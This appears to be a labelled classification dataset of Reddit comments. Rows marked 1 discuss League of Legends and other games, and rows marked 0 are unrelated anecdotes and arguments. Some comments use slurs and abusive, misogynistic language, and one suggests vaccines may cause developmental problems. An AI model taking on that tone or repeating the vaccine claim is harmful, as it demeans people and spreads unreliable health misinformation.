0	I made a generalization based upon limited information about an effect or phenomena possibly existing Outside the person of reference.   This is what people who are Not clinical freaks do in order to explain behavior.   It's specifically because I fail to see the need to ever really 'analyze' any single person that I reject the field, and so your comment seems to be somewhat off target.   Would you prefer that I attempt and run a brief MSE on this person's fiance, on reddit?   "Sir, what is her mood generally like when she does this?"  "Does she appear to have a high or a flattened affect; that is to say, is she seething with appropriate responses, or is she somewhat detached and disassociated?"  "Is she typically a clean girl?  How is her hygiene?"  ....   ...because at best, in this type of thread and manner of communication, there are immediate limitations on the amount of information that is likely to be gathered.   Therefore, I am reduced to making a broad generalization, and I think I delivered it with a bit of humor, dont you?   Because the real point to all of this was to bait little junior Dr Phils like you out of hiding so I could castrate your field publicly.   The statement that I would never trust a bitch that doesnt fart or shit around me is true, however.  And if you knew your Freudian psychobabble bullshit, you would probably be able to make a reasonable argument that there is something prohibiting this girl from releasing the muscles around her anus and enjoying the process of elimination while in the presence of her potential life partner.  That she would be embarrassed by doing so in front of him is actually a very telling detail about her attitudes and beliefs and expectations towards this relationship, if not at least slightly revealing about herself.   Either way, I never asked you to agree, if you would care to go back and check.   And to be frank, I was hoping for more of the long-legs to come out and play; occasionally, I run across a few high-powered ones.   You, on the other hand, are garden variety; a materialist who places too much value in the self-gratification of fictional abstracts hidden behind titles and diplomas; very common, in fact.
1	It's the problem with anything on the Internet, people feel secure behind their online handle. Being anonymous is a powerful thing. You can say/do anything you want without people knowing who you are, where you live. You can also be anyone you want, nothing from your "real" life is known online so you can create a persona for yourself that includes whatever you want.   The problem is that the raw power of that opportunity creates an environment where people can do whatever they want and get away with it. Your lane gets camped and you get frustrated? Call their jungler all sorts of names. They can't do anything about it. Your top lane has a bad game and dies a few times, even though you're slightly winning at bot, and then your team loses a teamfight? Blame it all on the "feeding idiot" from top lane. Once again, no consequences for you at all.  In fact, you haven't voiced your whole displeasure yet. Your team is down in gold and kills but your team doesn't want to surrender because they believe they can still win? Start cursing them out, wish cancer on them and their loved ones for wasting another 10 minutes of your oh-so-precious time. Maybe then they'll realize that they've ruined your game and that they'll never play again so as to not make you lose anymore. Again, zero consequence for you outside of the game.
0	Two funny stories about stolen bikes:   1) about a stolen bicycle: I was staying at my parent's house one night, and my bicycle was in their yard, in a greenhouse they had. She heard the newspaper delivery guy early in the morning, and happened to get out of bed a minute or so later to look in the yard, where she saw someone walk into the greenhouse, but not come out. She had no idea my bike was in there, and they didn't keep anything valuable in the greenhouse, but thought it was weird enough that she woke my Dad, and he called the police to report it.   I woke up at this point from the talking/noise, and after hearing what happened, ran out to the greenhouse to look, and sure enough my bike was gone. We relayed this information to the RCMP Officer that showed up, and as soon as we mentioned it and the newspaper delivery van, said, "I'll be back", jumped into his car and sped off.   An hour or so later, he shows back up with my bike in his car. Apparently he had noticed the van a while back, as it was driving around at a weird hour, and too note of it and which way it was heading. He tracked it down, stopped them and looked at the back, where he saw the bike.   He got the guy to confess on the spot, because he told them he had the right to seize the vehicle at that point.   2) My cousin had a motorcycle stolen from him. A few days later, his brother (a pretty tough dude) was stopped at a red light. He looked at the  guy on the motorcycle in front of him, and said, "geez, that looks like my brother's bike". He got out, walked up to the guy and once he confirmed it was the right one, hauled the guy off the bike and started putting the boots to him, and the guy ran off.   So, you never know... sometimes a nice string of coincidences happen!
1	LCS -->  The LCS players play to win and thus use the OP.  It follows that RIOT (probably already know cause they play it too) will nerf.  Leaving a character OP breaks the game.  This is not the league of jungle Lee Sin/Elise/Panth.   Win rate -->  Win Rate doesn't show how good a champion is.  Lots of people play the OP champion, most of them are not good at it.  Talon used to have a very high win rate and probably still does because only Talon Masters play him.  Talon OP, pls nerf?   Nerfs -->  RIOT nerfs what is unfair.  Examples:     Vi's clear was faster than Shy's with 1 or no damage items and her ganks were multiple times stronger. Didn't you wonder why everyone played Vi?  She did was J4 used to do: build only tank items yet still do large %health damage with AS steroids and armor pen, a shield, wall hop, pinning ultimate.     Panth can ult in from half map away at 6... and you can't predict the attack because he comes from jungle (TF is mid lane so if you can't see him you can pull back).  Nocturne can't ult to max range till 16.     Elise and Lee Sin both have infinite jungle sustain, do massive %health or huge flat hunks of damge to monsters (their Q + Smite can do hundreds more than other junglers at basically no cost), and have mobility/cc when they gank or run.  ...Where is the weak point?  Lee's late game isn't great but they're buffing it.  100% free AS on flurry?  0_0
0	I know I might sound crazy, but there's this thing you (and most people in this thread) should try, it's called not hating people because that changes absolutely-fucking-nothing, in fact it perpetuates the downward spiral of bullshit effectively making you just as much of the problem as the person you're hating.
0	Do you think so?   I think I'd respect someone who was open about their mistakes a little more than someone I'm ambiguous about, especially when the criminal courts burden of proof is "beyond reasonable doubt".   Mistrials do happen, innocent people end up in jail, but I'll probably always think if they're in prison, they're most likely guilty, and therefore if claiming innocence, they're most likely lying. From that, if they haven't been rehabilitated past that point, I wouldn't really want them let out.
0	I'll throw my feelings on the subject into the discussion.   A restaurant is a faceless corporation that exists to charges you money to give you a night off from having to cook your own meal and gives you an enjoyable atmosphere to experience it all in.   This corporation is run by people, when a person comes in 5 minutes to closing, it makes the corporation more money and the staff it requires to keep it open specifically to serve you a few extra dollars, but honestly... When you're working 40hours a week an at the end of an eight hour shift you don't give a shit and all they wanna do is go home, relax away the loud crazy kids, the bitchy people who didn't get their food prepared perfectly, but they can't because a few selfish people don't want to cook their own food tonight.   I honestly believe that no one should be allowed to order food within 20 minutes of closing time, cooks and servers need time to clean their stations so they can go home.
0	Something similar happened to me in both 5th and 3rd grade. They were both extremely bias against the boys. The 5th grade teacher harassed us, the 3rd grade teacher humiliated and disciplined us.   Our 3rd grade teacher had favorites, of which I was one at the beginning of the year, but somehow that changed. Soon I was the bad kid who was blamed as the ringleader for the 3rd grade boys. It got to the point where she would make me change clothes for gym in the same room as her while she watched, which was really traumatic for me because I have bad social anxiety. She said I would cause too much trouble if i was left to change with the other boys, and would give me detention if I refused to change out of my uniform for gym. She's dead now, of old woman syndrome.   My 5th grade teacher was just generally biased against boys. She once lined us all up and made us tell the class if we were circumcised or not. She wouldn't let us leave the room until all boys answered. This was a catholic school, so those who were not circumcised were seen as outliers, and the whole school quickly knew. I was sad knowing that one of my close friends was now being made fun of because he had to tell a bunch of 5th grade girls that his penis looked different. This same teacher also told me I would go to hell because I went to church with my episcopalian father. When I told my dad all of this, he came into school and shamed our teacher into tears. Literal, glorious tears.   I'm now a 23 year old agnostic who hates authority. Thanks school! I grew up fast.
1	A thousand times this. Nothing bothers me more than when a jungler, after a gank (and in a situation where we aren't pushing the tower), stays and pushes the lane. Taking a few last hits is all right since I understand that he needs to make up for the time he wasted, but I hate it when they just chill and repeatedly attack minions. All the time I've spent positioning the lane where I want is now wasted, and BOTH of us are going to end up missing CS.   For example, a frequent occurrence is that I'll be bot and the jungler will gank. Then both enemies will take good damage but either just the support dies or both of them live. The jungler then chills in the lane autoattacking every minion, denying either me (or if I'm the support, my carry) cs. Without bothering to dive, the jungler just lumbers back off into the jungle. Now the enemy carry will have several waves of safe farming under their tower and on their side of the river.
0	I moved out after a few years of my wife treating me like crap. She said she desperately wanted to go to marriage counseling. When we were there I had to say everything that was wrong, I did so calmly.   After my ex wife was asked, she said that all my problems were false and started attacking them. The counselor asked her to stop and asked what her problems were, what was I doing that was wrong. My ex wife sat there silent for a while, then started again that everything I said should not be an issue.   The counselor stopped her again and asked what HER problems with me were. My ex then started yelling at the counselor telling her it was her job to tell me to move home. How dare she take my side, she should have her licence revoked.   The counselor tried to calm her down, explained she was just asking what my Ex's issues with the relationship with her were. That no one took sides. This made it worse, after 30 minutes they were both standing, my EX screaming at the counselor, the counselor telling her to sit down and calm down.   Right at the end of the session my ex finishes with "So are you going to tell him to move home, or are you just horrible at your job" and the counselor looks straight into my eyes and says "I think him moving home at this time would be a huge mistake"   We ended up having a second session, halfway through the counselor apologised to me, and then asked her to leave without charging us for the session. I paid anyway and thanked her for her time ..
1	As a result of several bans   Well, if you can't realize after several bans that your attitude is a no go, why should you have the opportunity to keep playing?   If your account wouldn't be permabanned and only banned for few weeks you wouldn't even bother and still flame on.   >  Also do you guys think I should maybe get a 2nd chance   Hell no. If you can't change after few days/weeks bans, you won't change
1	I'm not a high elo player, but let me say this.   If you play one champion all the time, you'll get good at that champion, and you'll know the match ups, you can win the match ups, and you'll generally perform well on that champion.   Then you're banned or someone else picks your champion? That would render you useless, as you wouldn't have practiced any other champions. Say you start at 1200, you raise to 2000 with one champion, and suddenly you can't play that champion anymore. You're bound to lose lanes.   So, you should always know how to play at least a couple of champions well, but you can still focus mainly on one champion.   So yeah, sure, you can raise up in elo spamming one champion, no problem. But if you only play one champion, you're bound to perform worse on others.   Just pick 2-3 champions and play those.   I usually play mid, and I've found myself to be successful on Kassadin, Ryze and Orianna. But of course, I can't always get the picks or maybe not even mid lane. So I know how to play champions for every other role as well.   I'm pretty decent on Yorick (Yeah I know OP boring faceroll gay champion, but I play it better than some people!) for top lane, I generally perform quite well on Nocturne when I have to jungle, as for AD I seem to be unable to miss Ashe arrows (I seriously have a super high percentage for landing those) and for support I seem to play Soraka and Taric quite well.   If I had to pick one champion who I would use to carry myself, it would probably be Orianna, because not many people play her, so not many people know how to win lane against her.
1	There's also carrying potential in supports. I main support, and in previous seasons, I couldn't carry, because good vision and good engage/peel doesn't win a match when your adc is trying to kill their carries in teamfights. Now in season 4, I can play Annie or Lissandra and build ability power and be able to carry. Consider that they may be trying to climb out of bronze/silver/whatever, and because they are a support main, they need to take some damage into their own hands. Just because they are a "support" does not mean they are supposed to be ward bots that stacks defensive stats. I often have more gold than our jungler (and sometimes our top laner) and a better kda than our adc, and it benefits our whole team because I build offensive items that create 5 threats on the board instead of 4.
1	Well, first of all, you don't want to feed, so you should probably rush Guardian Angel. You might notice that Malphite uses a lot of mana, so buying a Chalice is probably good after this. By then, it'll probably be hard for you to last hit, so buying a Bloodthirster isn't a bad idea, after all the shield stacks with yours. Your abilities might feel a bit lacking, though, so a Rabadon's is next. By this point you will be fairly tanky and do a lot of damage, but you could be doing more damage, so you should buy Lucidity boots. Finish off with Executioner's Calling to ensure that you will win duels against people with lifesteal.
0	I don't know about the Bronx, but i live in Brooklyn and when I moved into my new place, the supers son- a real douche- hit me up for 20 bucks he was short on. I obliged not wanting to start off on a bad foot with my neighbors. Kid said he'd put the money under my door. He never did, but in exchange he avoided me like the plague. After hearing multiple arguments with his mother the super and a Building mate saying he'd invited him to his place only to be magically robbed the next night( Xbox , laptop, tv) . Eventually the cops hauled him away not to be seen again.
1	League is a game of opportunity. I shouldn't be 'punished' just because that player is DC'd.   For example, what if that player was overextended in my lane and my jungler just came to the lane for a gank. For this example let's also just say the overextended had already blown flash and just used their dash.   Now this is an example of a sure-kill. There is no chance that they would escape from this, dc or no dc. If they dc'd why would you not kill them?   I realize that this is an extreme example which would fit only a small selection of DC cases.   My point here is that why should the player with a stable connection be punished with a lack of opportunity just because the individual with the unstable connection just DC'd.
0	You are right that this kind of overpricing is not fully explained by just sayin there is supply and demand. The "problem" this is trying to solve is that there are usually  fixed prices  for a product.   Let me expand on this (ELI5 version):   Let's say there is a product that costs about $80 to make (and market). Now you analyze the market and try to find the price that is making you the most money. If the price is too high, few people will buy, if the price is too low, you won't make much money per unit. So you find the "best" price is $100.   But every individual buyer has his own limit what he would be willing to pay for the product. There are some guys willing to pay $90 max, so there would still be a profit, but you are simply not making the sales at a $100 price. And on the other hand, there's a rich guy willing to pay up to $200, but he gets the product for $100, too! That's lost profit for you.   Obviously, it would be best to negotiate each sale individually, but that's problematic to realize and seems kinda not fair. So you start to change your product into basic, standard and deluxe versions, and sell them at different prices, making more profit.   The important thing is to see that the additional "value", the additional costs to provide the deluxe product and the additional price you sell it for  don't have to be related at all . Because rich guy has already been willing to pay $200  for the standard version of the product . And this is why upgrades are usually way overpriced, and you get better value for the standard product.   Example: 16, 32, 64 GB versions of an ipad. Apples additional cost to make the big versions are neglectable, yet the price differences are high.
1	Deft's damage output and his own lane mechanics are amazing though like he's constantly 50-70 percent of his team's damage and has great positioning. He and imp are like the two best AD's in the world. Clearlove is inconsitent in when he's good or not (sometimes he just never shows up on the map n all) but regardless Deft does enough to win or go even. Meiko and CL mainly just back up PawN in the lull of the game or gank for Koro to get him an advantage so he can get ahead enough to bully. Meiko also is good but his control of the lane is kind of odd when he roams so much and he also doesn't do a lot of things that say Mata or Heart do in that he isn't amazingly strong in lane which is where Deft comes in and Deft has a good knowledge of trading and wave control which is why I think he's the carry in lane and his damage output is absurd in team fights which is also why I think he's the carry outside of the lane as well.
1	I see what you're saying but I cant agree on all points. As you say you have a somewhat normalized lp gain but that's only if you are playing often and hold an average close to 50% winrate. If you get in the situation that you either win alot in a row or lose alot your lp gains are significantly altered. I started uni this semester and got to play less and for not as long. This resulted in me losing more then I used to and dropping from D3 to D5. There I got stuck at o lp while playing 1-2 games a day. Id win ~11 and lose ~30 lp and I wouldnt drop down either. That situation is just he worst to be in because you cant make progress in either direction. It would have been better for me to drop down but the system holds me in place, meanwhile Im sitting there getting zero enjoyment out of it because even if Id get a 3 win streak its all gone in 1 lose.   What I want to see is not the old system back but divisions as they are now but, as you said, no teir promotions and a flat lp gain/lose. I believe that if you deserve a higher ranking that means you can win >50% of games. If you cant you deserve to be where you are. And no safety nets at any point.
1	This has happened to me many times, and frankly, i don't see why you have a issue with it. So what if you can't pick your "favorite" roles, Solo/Duo Q isn't about picking your favorite roles, its about adapting to your team comp and learning how to play every role proficiently, while still being able to dominate games when you get your normal picks. Duo queuing should not be an advantage, not everyone can duo queue and it would be unfair to solo qers if a duo q always got first pick.
1	Well..i'm not so sure about this.   I have always felt that the main issue with ranked is that there may in fact, not actually be more raging kids than a normal game but the very fact that there is now a points element attached to the outcome of the game, suddenly it matters more to you.   If someone in an unranked normal game is flaming or generally just being unpleasant to play with, you tend to shrug, report them and carry on. With ranked, the actions of a troll/feeder/rager are much more noticeable because a loss incurred by them has a lasting legacy. You will remember those lost points, that promotion series you lost because of them. You dwell on it more and you convince yourself that this sort of behavior is endemic in ranked.   The end of the season tends to exacerbate this because you have this same issue of dwelling on the losses and actions of others in game, with this constant knowledge in the back of your mind that there is a deadline.
1	Unfortunately my MMR surpasses my current league so i'd have to go on like a 15 game losing streak to lose it. It's irritating to win 3 games, get to promotion series, lose one, win one lose one. win 3 straight again, lose, win, lose etc. and go through 4 promotion series like that before finally winning one lose one win one. Now i'm currently on the next winning streak and just made a promotion series where I lose the first game, won the 2nd, and more then likely will lose the third and this will happen 3-4 more times before i finally get promoted again weeeeeeee.
1	I feel like the best way to show the severity of this issue is to take the collective amount of time wasted by players. Assume 1/20 games has an afk/disconnect ( for me it seems like 1/3 games has one but 1/20 is more conservative), 9 people x 20 minutes = 180 minutes wasted per game. There's something like 30 million people on this game. For the example, assume all 30 million are playing. Thats 3 million games. .05 3000000 = 150000 games with an issue. 150000   20 minutes = 3 million. That's 3 million minutes wasted once everyone plays the game. Riot can easily fix this issue with much less than 3 million minutes of work.
1	How did Lily still not make
1	actualy, without Nunu, Willump would be nothing   He would be just wild creature ready to kill anybody that steps on his way.   Nunu was the brave kid that was prepaired to thake that challenge - The challenge to tame Yeti.   But on the other hand Nunu would be nothing without Yeti too - no powers, no strength   [
1	I agree.
0	Ok I am going to say it:  I  sort of  believe it. I don't think vaccines directly cause autism or any medical conditions directly but the thought has crossed my mind that they have some impact. I'll tell you why.  Me and my 2 other cousins were all born 4 days within each other. We were all normal, healthy babies up until around 2-3 years old. Then one of my cousins started showing development problems. This cousin was ahead of me and my other cousin developly speaking(he was starting to learn how to walk etc.) At around the time he started showing developmental problems was around the time we all got our vaccines. Ever since then he hasn't been able to speak or walk and can't really function.
1	According to how evil this was from Thresh, he was possessed by Teemo.
1	It works the same way as alistars W. It cannot interact with other movement spells. It is not displacement but a spell that repels the enemy a specific range back from poppy.
0	If that's the only way you can interpret it, then you need to work on your critical thinking skills. It's moreso assuming that anyone who runs home and makes a meme about their bad date (boy or girl) is probably a socially awkward neckbeard, who did something really awkward to warrant the reaction, whether it was a girl talking about her cat, or a guy showing up in sweatpants and a fedora.   In other words it was a joke, one that you apparently are too much of a moron to get, or too self righteous to appreciate (instead of assuming I'm some sort of sexist).
1	Well you have to think about some things.     Corki had jsut gotten ot the fight fresh while CLG had no ults left   The 3 near death on WE's side were really only tanks/some dps, while Ezreal was abotu to have his GA popped   Based on Ezreals position, when he came back up he would have been insta killed by Corki/WE   With Ezreal down it would have come down to Oriana to clean up the rest of WE, 2-3 of whom have GA i believe
1	Also, Dota 2 server are as often down.   > I once was a Dota1 enthusiast, however I stopped because I felt like the developer didnt care about their game, and patched every 5-6 months. Then we would get 2-3 hero changes, and sometimes a new hero. I got bored after a while.   Ok, stop. Go away. What a stupid thing to say.   You are saying Icefrog/Valve don't care? They care a hell of a lot. Hence why they put out amazing, well thought-out and balanced patches far apart from each other instead of small, bug-filled and half untested ones like Riot do.   DotA 2 patches take time because they like to get everything right the first time, instead of releasing half-baked shit to the public only to apply hotfixes every fortnight.   You know how many changes DotA heroes go through? Not much at all cos again, they like to get them right the first time. Look at Rengar. Riot have gutted that champion and changed him in like 4 patches. Instead of dedicating time and effort to it.   DotA 2 is down hardly ever. Literally, hardly ever.   You are attacking and bitching just as much as Kittz is, yet you call him out on it. Classy bro.   Get a grip, Kittz brings up some very good points, don't pick the couple you disagree with and call him out on it.
1	I too, have experienced these issues, BUT something everyone should know is it is NOT riots fault. although, to my limited knowledge, an east coast server would indeed help, it is something else altogether. Its important to note that this DOESENT effect all of the east coast players, because if it did then riot would obviously go out and fix this a lot sooner, as they would be losing a large chunk of their playerbase if none of us could playThe last time it was unplayable was on patch 3.10, right after the update. I could not play because my connection was so terrible, but everything else was fine. I have 50mbps upload AND download, and a wired connection, so this didnt make any sense to me. I looked into it, and apparently there is some kind of bottlenecking system set up where companies unrelated to your ISP can bottleneck connections, and do this to basically blackmail you into using their internet services instead. A VPN fixed this for me, and i had much more stable ping. I dont remember a lot of what I read when looking for a fix, as it was months ago, and I didnt read much anyway because it started swirling together with net neutrality laws and I didnt care much.
0	As someone who's a fan of the genre and of the idea of the show, I find that it's a show like the X-Files, where you can sit down and watch it from the beginning and plow through, which many people (myself included) have done with both shows (at least new Dcotor Who).   But the intent, I believe, in showing them those specific episodes are to use them to try and create a fan of the show in one episode. Two of the three episodes mentioned aren't typical "best" episodes, but rather ones that establish a kind of reference point for what the show is. And, if you like those episodes, chances are that you'll like the show as a whole.   The show, like the X-Files, is one with a broad spectrum of quality, largely centered in the "pretty good" section. There are certainly bad episodes to go with the very good ones, and because of its genre, it's a show that is very popular in communities like Reddit, so it probably gets more discussion than it merits. But it's still a fun, largely good show.
0	Gonna be honest, went on their site- i have no idea what the hell you guys are talking about. A lot of their polos and tees are pretty nice and there's way more no logo ones than logo tees. I mean all they really have is that tiny moose where every other company puts their logo. Yeah its pretty expensive but i have some from hand me downs and they lasted a shit ton of years and their comfortable. I mean the hoodies, tees, polos, and basically everything are just normal clothes. I don't know why you guys feel like everything from the store is a walking billboard since i barely saw any huge logos on the merchandise online. Stop hating a company just for the sake of hating something, who gives a shit if the owner hates uglies or fatties, i mean reddit makes jokes about people like that all the time.
0	How are tablets "always so awkward and uncomfortable to hold at an angle where you can read or interact with"? For reading or digesting media that doesn't require interaction, you just hold it like you would a book or plant each hand either side. For interacting with it, you either have your hands either side and use your thumbs or hold it with one hand and do shit with another. My Nexus 7 weighs nothing, fits my palm perfectly and has a keyboard that makes it really easy to use with just one finger.   I'd never use my tablet as my catch-all main device but it's perfect for any kind of media consumption or shitty games, especially when my tablet has a higher resolution than my computer monitor.
0	It is a horrible burden to bear. . .   The financial security, the expensive vacations, the wonderful restaurants, the golf. . .   Truly, my life is empty.   Edit:  I'm not advocating money as a way of life.  But I'm trying to provide a reality check here.  Money is really, really, really nice to have.  Compared to a parallel universe with a poorer me, my kids grow up in a nicer neighborhood, get to play soccer, ski, or whatever, graduate with no student debt of any kind.  Meanwhile, when I get sick, I got to the hospital without worrying how I'm going to afford my mortgage.  When it is shitty in winter, I take two weeks and bring the fam and the grandparents to the dominican.   The idea that money does not improve your life is a hilariously farcical message that has been sold to you by big corporations (hollywood, hallmark, blah blah blah) attempting to appeal to your emotional purity.  I bet you same guys rage at wall street all the time for destroying the economy: by this logic, they are making your lives better by making you poorer.
0	I think my response to your unpopular argument is an even more unpopular argument.   I do support the idea that you should learn to love yourself. But I also think that when it comes to attractiveness, there is some degree of intersubjective consensus on what features are attractive and what features are not as attractive. The intersubjectivity developed due to evolution; indicators of attractiveness (such as symmetry, for example) signal potential mates that the attractive person is a healthy person to mate with for reproduction.   I don't think that the government should pay for every single modification to your body; I don't think you should be able to say, hey, I have a 7-inch penis, but if it were 8-inches, I think I would be able to have even more sex! So government, pay for an inch-long extension to my penis.   But at the same time, I think that if you have an attribute that causes you to have severe mental anguish, and you cannot afford to ameliorate the condition, then I do think that the government ought to help you out. As an opposite example, a person with a micropenis should receive government help. (Obviously, this pre-supposes a universal health care system like the one found in Canada or the UK)   So I think it should be done on a case-by-case basis. Certain features, like micropenis, gynecomastia, etc. can cause major grief. I don't think fixing it alone will suddenly make you happy. But it is one part of the process.   Just like the right to life is hollow without an adequate health care system, reproductive rights are also hollow if you do not care for individuals with major deformities that almost serve as an affirmative bar against being able to reproduce.
1	The biggest problem I have with this idea is that you wouldn't be able to move the camera away from your champion.  One of the biggest pros to having the camera unlocked is being able to see your teammates in other lanes, when they come down to gank, when you're ganking, and just keep a better idea of what's going on across the WHOLE map, not just what's happening around your character.  Try playing with your camera unlocked.  I quit locked cam cold turkey and it turned out okay in the end.  You can activate skill shots (without actually casting them) and use that range as a means of keeping track of your champion in fights or just reentering lane.
0	Virginia tech is paying me 800 dollars to record me while I'm driving at all times. They want to study how someone who is 15 and has a learners permit differs from regular drivers.
0	I'm actually glad you said that, because now I understand where the disconnect (or at least one of them) between our arguments lies.   >The fact is that vaccination does NOT stop you from carrying bacteria or viruses in your nose, throat, intestines, airway, skin, or in your body.   You're absolutely right about this!  Virus particles and bacteria can certainly be spread like any small particulate, particularly when they are aerosolized!  But [they only GROW and EXPAND when they are infecting a human host, and we have measurements of how many other people a single sickened person can infect for various diseases](   But let's be clear:   I never disagreed with the above point that we can carry germs on our clothes with our dirt.   You're constructing a strawman to knock down when you accuse me of that.   To be honest, those strawman fallacies are pretty easy to commit [when you copy and paste someone else's blog post]( and don't even bother to cite your sources.   You're also incorrect anyways.  [We actually know about:](   >the ability of conjugate vaccines to protect vaccinees not only against disease but also against nasal carriage, and hence infectiousness   The blog you took your quote from is specifically talking about the pertussis part of the TDaP vaccine.  [Even that argument, that acellular pertussis vaccines don't prevent the spread of whooping cough, is contentious](
1	I am in no way a high elo player, but i am pretty good at this game and i think i can give a few tips.  You should try to play really defensive/passive, and only go up to the minion wave to last hit. (note: stay in xp range)  It is hard, but very rewarding of knowing when to go in to farm and when to trade. At early levels, you want to be trading when you have a minion wave advantage, level advantage, position advantage.   If we take the specific matchup Riven vs Teemo, this is a breakdown of what is going through my head. Did he use his Q? Did he become overagressive? Did he make a major mistake? (ex: take a lot of free minion dmg, poke you under tower while taking a few tower shots) All of these things signal that you should go in.
1	Because if its not the lane he wants, but the champion, he can just take the champion to another lane and still get effective practice. The
0	Sometimes I feel the same way. Everyone around thinks I'm one of the nicest people ever, and I try very hard to be. (In IT support) I find it much easier just to accomplish tasks myself. I want to be able to delegate and I think its a necessary skill for the future. Sometimes I also just find it easier to complete the task than try to explain all of the intricacies.
1	I'm D1 and I ban Draven in every game unless I have a teammate who wants him.  His damage in early trades is still huge, and he snowballs so hard if he manages to get an early kill.   [
1	DO NOT be afraid of his windwall if you are laning vs yasuo, it has a fairly long cooldown comparing to other abilities such as ziggs' or leblanc's q. Try baiting the windwall out and he is extremely vulnerable next trade. One more thing, if your jungler is ganking enemy yasuo, don't fool yourself of walking to close to him with squishy ap carries as vel'koz or above mentioned duo as he can/will try to attack and kill you due to his inability to escape the gank by just walking back to his turret.    Keep track of his e stacks as it has a huge impact in early/mid trades.   I have the most problems against yasuo when I play Draven, as the axes don't bounce off the wall so beware of that in teamfights. As kiting yasuo, remember not to walk near your minions because he will use them to dash to you. Try taking advantage of yasuo's pushing/overextending and trying to all-in you all the time.
1	It's kind of a long read, but its certainly a decent approach to make the Honor system something akin to an obsession to players, since if anything the Human being can be quite competitive about the most stupid things if they want.   Basically the "analogy" or approach i want to suggest for the honor system would be to get some Average numbers of the amount of honor the player base have, and catalog the numbers into something like this (Following the same structure the graph in the link shows)   -The best example of honor behavior players in the game have X amount of honors   -The Average player in league have X amount of honors   -You have X amount of honor   Showing those 3 simple things could potentially make the Honor system something more used, since people would actively strive to be one of the Best Honored player in the game. A certainly lack of the current honor initiative is that only YOU know how honorable you are, it doesn't show or give you something to compare yourself to see if you should strive for being more honorable or if you are honorable enough.   Just some food for thought i guess. Have a nice day :)   >EDIT:
1	Start to think that you are the problem. Blame you for (almost) everything your teammates do wrong. Try to find a way to make their bad move, a good move. I'm in diamond and it's not elo heaven as you could think. There are still people who has some bad games, and it's even harder to carry.
1	This is a point which is all too often overlooked. Just because someone is a lower/higher rank than someone else, doesn't mean that they are necessarily right or wrong about anything. Its just like how in sports (football for example) coaches call the plays/make decisions because they simply know better than the players what should be done in certain situations. Just because the coaches/analysts aren't able to execute the plays themselves doesn't mean that the plays they call are wrong.
0	As a waitress, I HATE teenagers. 15 to 17 year olds that come as a group with no parents. So annoying and takes forever to order.  Then leaves barely any tip. I worked at my in laws Mexico resturaunt and a Hitachi spanish class came in. I was their lucky waitress. Huge pain in my ads especially hearing their terrible try and Spanish.  Its pollo not polo!! At the register this one girl in particular had a $9 and some change tab. Gave me a $10. As I'm giving change back the teacher reminds them to tip. She giggles and says "oh this is all I have" and gives me this change back. I judt stood there like really?? That's when the teacher chimed in and chewed her ass out. Judt hearing the ass chewing was good enough for me. But then after all the little pricks were outside the teacher hands me $40 for my troubles.
1	I've actually done this twice but I ashe arrowed baron from spawn and stole it today, it was so damn epic and the smile on my face afterwards didn't wane till we lost afterwards but oh well. I also was on master yi I used to jungle with him quite often, whole team goes to baron as the other team is doing it I ghost straight down there from spawn, whole team dies they have baron buff. Alpha strike in there and I was so farmed/fed I just hacked em all down with my lifesteal a.speed build penta kill then look at chat 5 of purple have agreed to surrender. I guess it keeps me playing when I bust out epic stuff.
1	When somebody AFKs in a game for more then 10 minutes it's going to have a negative effect which is extremely hard to reverse and it ends up in ruining the however long the match is for the other 9 (or at least 4, I'm sure some of the enemy team don't care whether its fair). He broke the code, no matter for what reason, he is punished. He has clearly been punished before, has been given a final warning and he refused to learn how to manage his time and refused to properly respect the rules of the game.   Course not!!! And he has not been punished for getting a quick drink, and being in base for more then 10 seconds! It's more like he has been stealing and stealing, given warnings and until the final straw came and he pickpocketed someone on the street. That's a more fair and realistic analogy.   Seriously, if you have an issue with the case, report it to Riot and I am 99.9% certain that they will give you the same explanation and will include the main point of his history being hugely involved.   It would be wrong if that's how tribunal worked, if it was occasional. Clearly it hasn't, there are only a certain number of chances one can receive.   To conclude, yes there are cases where people just spam punish, I recognize that fact (the famous case of Edward, March 2013). However, you're arguing that the tribunal is broken because he has only one report on his case. That is a clear indication that he has had a history of punishments/tribunal cases etc.
1	Well I am in Silver as well and I played quiet a lot games there. I always thought I'd be one of the better players and that I deserve to be gold (like most of the people^^) but to be honest. I don't belive in Elo-Hell anymore. You pretty much get what you deserve. If you have trouble getting out of S5 then you aren't good enough.   Ofc you seem to understand this part so lets get to the interesting part shall we?   I've searched for a team and we're currently playing every evening. I now know that my understanding of the game mechanics was ridiculously low and that there is way more to the game. After playing for a few week now I started playing soloQ again and what happens? I'm on a 6 games winning spree and got a division up. I and even thou this spree didn't last for much longer I win now about 70% of the games. I don't have any trouble to climb up. So you should search for some people who have a pretty good knowledge of the game and train with them. You will learn so much and even if you team is bad you might be able to carry them because what I experienced is that very few silver players know how important objectives are.   I played vs a TF once and he kept ganking ever 2-3 mins with his ult. My team was raging because he got one or two kills every time but after 20 minutes I took their inhibitor because they always ganked the lane with 4 people and I had a free mid. TF didn't realize that he wasn't able to gank at those specific moments and the game was one of the easiest wins I ever had. the team results were 45/69/83 ...so be basically were far behind but they kept on ignoring me pushing towers.
0	I've seen a lot of sick shit here on Reddit, but yesterday was the first time I shut off a video within the first few seconds.  Other people in the comments were saying the same thing.  The title of the post was Guys find and rescue a cat that was left to die.  It was posted in /r/videos.  The tag said NSFW, but it should've said NSFL too.  Anyhow the first few seconds are so heartbreaking I had to shut it off, especially after finding out the post title was misleading and the cat dies after a few days.  I was going to post the link, but I don't want to scar anyone else's brains so they can look it up themselves.  I'm actually still disturbed by it today.
1	ALSO FUCK KASSADIN   The unkillable, unlimited flashes are ridiculous for soloq just get rid of the champion. Do what they did in Dota and atleast ban him from ranked, like Drow ranger. He has an easy laning phase with shield and deals insane amounts of damage and can then run away.   The champions isnt fun to play against. My last game I was carrying hard and he is an unkillable one shot machine.
